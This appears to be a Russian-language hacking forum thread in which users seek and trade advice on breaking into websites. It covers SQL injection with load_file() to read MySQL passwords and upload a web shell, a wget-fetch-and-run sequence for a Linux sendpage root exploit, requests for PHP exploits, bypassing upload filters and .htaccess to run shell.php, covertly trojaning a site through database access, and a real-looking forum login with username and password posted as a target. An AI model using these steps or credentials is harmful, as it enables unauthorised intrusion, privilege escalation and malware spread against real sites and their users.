load_file() скрипта, прочитай его, глянь как запрос составляется, исходя из этих данных залей шелл через "двойной запрос"(если возможность есть такая), в противном случае, читай файлы и доставай инфу, которая поможет залить шелл(пасс от мускула и тд) посмотри таблицу с юзерами, глянь админа, и по аналогии сделай так же.
нашел уязвимость "вставление пхп кода"HP не ограничивает набор символов в идентификаторе сессии (PHPSESSID) в обработчиках сессии, разработанных сторонними производителями, что может облегчить злоумышленникам, действующим удаленно, эксплуатацию других уязвимостей, если они внедрят PHP-код в PHPSESSID, который хранится в файле сессии. Замечание: существует мнение, что данная проблема не является уязвимостью в самом PHP, а является скорее конструктивным ограничением, которое позволяет проводить определенные атаки против обработчиков сессии, которые не учитывают данное ограничение . как можно етим воспользоватса? еше насканил "пеереполнение буфера":Переполнение буфера в функции snmpget в расширении snmp в PHP позволяет злоумышленникам выполнить произвольный код, используя длинное значение в третьем аргументе (object id). так же уязвимость форматной строки и повышение привилегий все ето на 80 порту сайта помогите пожалуйсто наитй експлойт или что то т.п спасибо
скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
у меня легко читаются папки. но не могу прочесть .php файлы. не знаю что за бред. p.s и дальше /usr/local/www/apache22/data/http даже папки не могу смотреть. юзаю hex
http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz tar xvfz 2009-linux-sendpage3.tar.gz chmod 777 linux-sendpage3 -R cd linux-sendpage3 ./run
прав нет значит на файлы. Если текст запроса в случае ошибки не выводится, то проэксплуатировать "двойной запрос" будет сложно - если только подбирать варианты, и это в случае если действительно есть два и\или более запроса
Как можно незаметно затроянить сайт есть доступ к БД что можно там написать что бы сайт попал под потанцеально опасные для пользователя сайты в выдачи поискавика.
Есть файл .htaccess в нем <Files *> Order Allow,Deny Alow from All </Files> из-за него выдает ошибку 500 какуюто. Нужно шоб файлл shell.php читался свободно!
На сайте есть загрузка pdf,doc,jpg файлов. Заливаю шелл: shell.php Выводит такую ошибку: shell.php already exists Пробую так: shell.php.pdf Выводит: shell.php.pdf already exists Как здесь обойти фильтрацию?
http://www.acforum.net/index.php?pid=40&lang=1 username:Neil Kirkman password:neilk Здесь реально залить шелл?